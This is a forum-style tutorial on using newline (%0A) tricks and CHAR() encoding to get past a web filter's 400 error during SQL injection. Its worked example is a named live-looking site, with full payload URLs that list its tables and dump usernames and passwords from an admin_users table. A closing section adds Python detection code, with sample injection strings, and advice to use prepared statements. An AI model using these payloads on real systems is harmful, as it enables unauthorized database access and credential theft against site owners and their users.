400 error

400 Bad Request Bypass

# 400 bad request #

OK, so today I will teach you how to bypass the 400 error :)

OK, so you are trying SQLi on a website and then a 400 error appears :\ (it means that your browser sent a request that the server could not understand). It should look like this (by the way, that website has 1 column; at the end I'll try to explain what to do when there are more columns):

[IMG]

Also, the link if you want to check it: www.krumplitas.lt/index2.php?id=-1‘ union select group_concat(table_name)from information_schema.tables where table_schema=database()–+

The first thing we need to do is write %0A after union and before select ( union%0Aselect ), so it should look like:

[IMG]

Link: www.krumplitas.lt/index2.php?id=-1‘ union%0Aselect group_concat(table_name)from information_schema.tables where table_schema=database()–+

And yeah, you bypassed that error :)


Now we need to get information from the table admin_users, and when you try with union%0Aselect the error appears again!
What we need to do is write another %0A at the CHARS=(97%0A, 101 , 96 ………)

OK, so let's see what happens. The link is: www.krumplitas.lt/index2.php?id=-1’union%0Aselect group_concat(column_name) from information_schema.columns where table_name=CHAR(97%0A,100, 109, 105, 110, 95, 117, 115, 101, 114, 115)–+

[IMG]

And there you see, you got the information from admin_users! ;)

And for the end, the link is: www.krumplitas.lt/index2.php?id=-1’union%0Aselect group_concat(vardas,0x3a,slaptazodis) from admin_users–+

Just add %0A after union and before select ( union%0Aselect ) :)

And there you go, you have the login details!

[IMG]

But sometimes you also need to know where the error begins! For example, a website has 20 columns:

site.com/something.php?id=1‘ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+–+/

And you see the 400 error ;\ and you need to figure out where the error starts, like:

site.com/somthing.php?id=1‘ union ( no error )
site.com/somthing.php?id=1‘ union select 1 +–+/ ( still no error ) 
site.com/somthing.php?id=1‘ union select 1,2,3,4,5,6,7,8,9,10,11,12+–+/ ( still no error ) 
site.com/somthing.php?id=1‘ union select 1,2,3,4,5,6,7,8,9,10,11,12,13+–+/ ( And error! )

So we know the error starts at 13… so then you just add 13–+%0A,14–+%0A,15–+%0A until you have written all your columns :) So the full URL with 20 columns and the error at 13 should look like:

site.com/somthing.php?id=1′ union select 1,2,3,4,5,6,7,8,9,10,11,12,13–+%0A,14–+%0A,15–+%0A,16–+%0A,17–+%0A,18–+%0A,19–+%0A,20–+%0A–+
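
Seen from the defending side, each trick above works because the filter matches the raw request text while the database sees the decoded, comment-stripped statement. The following is an added example, not code from the original post: a detection check that normalizes a parameter value first, assuming the 400 comes from a literal text match; all function names and sample values are constructed.

```python
import re
from urllib.parse import unquote_plus

_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# MySQL line comments: "#" or "--" followed by whitespace, up to end of line.
# Simplification: string literals are not parsed, acceptable for detection only.
_LINE_COMMENT = re.compile(r"(?:#|--(?=\s|$))[^\n]*")
_WHITESPACE = re.compile(r"\s+")
_UNION_SELECT = re.compile(r"\bunion (?:all |distinct )?select\b")


def normalize(raw_value: str) -> str:
    """Reduce a raw query-string value to roughly what the SQL lexer sees."""
    text = unquote_plus(raw_value)        # %0A -> "\n", "+" -> " "
    text = _BLOCK_COMMENT.sub(" ", text)
    text = _LINE_COMMENT.sub(" ", text)   # a line comment ends at the newline
    return _WHITESPACE.sub(" ", text).strip().lower()


def naive_filter(raw_value: str) -> bool:
    """Literal-space match on the decoded value: the rule that %0A slips past."""
    return "union select" in unquote_plus(raw_value).lower()


def normalized_filter(raw_value: str) -> bool:
    """Same intent as naive_filter, applied after normalization."""
    return bool(_UNION_SELECT.search(normalize(raw_value)))


# Constructed sample values for an "id" parameter (not captured traffic).
SAMPLES = {
    "plain": "-1' union select 1--+",
    "newline": "-1' union%0Aselect 1--+",
    "char_list": "-1' union%0Aselect CHAR(97%0A,100)--+",
    "commented_columns": "1' union select 1,2--+%0A,3--+%0A--+",
    "benign": "42",
}


def report() -> dict:
    """Map each sample name to (naive verdict, normalized verdict)."""
    return {n: (naive_filter(v), normalized_filter(v)) for n, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, norm) in report().items():
        print(f"{name:18} naive={naive!s:5} normalized={norm}")
```

Normalization only lets the filter see what the database sees; the fix for the injection itself is to bind `id` as a parameter in a prepared statement instead of concatenating it into the query.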